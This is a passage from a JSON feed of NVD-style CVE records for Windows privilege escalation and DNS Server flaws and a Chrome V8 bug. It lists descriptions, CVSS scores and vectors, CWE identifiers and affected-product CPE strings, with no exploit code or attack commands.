"cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24500", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24500", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:13:06", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "cve", "title": "CVE-2022-1096", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "cpe": [], "id": "CVE-2022-1096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:27:58", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24481.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24521", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-22T15:26:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", 
"cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:51", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-24521.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24481", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-22T16:46:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24481", 
"cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26821", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:49:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", 
"cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26821", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26821", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26820", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:50:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26820", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26826", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:18:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", 
"cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2022-26826", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26826", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26829", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:17:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], 
"id": "CVE-2022-26829", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26829", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:standard:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 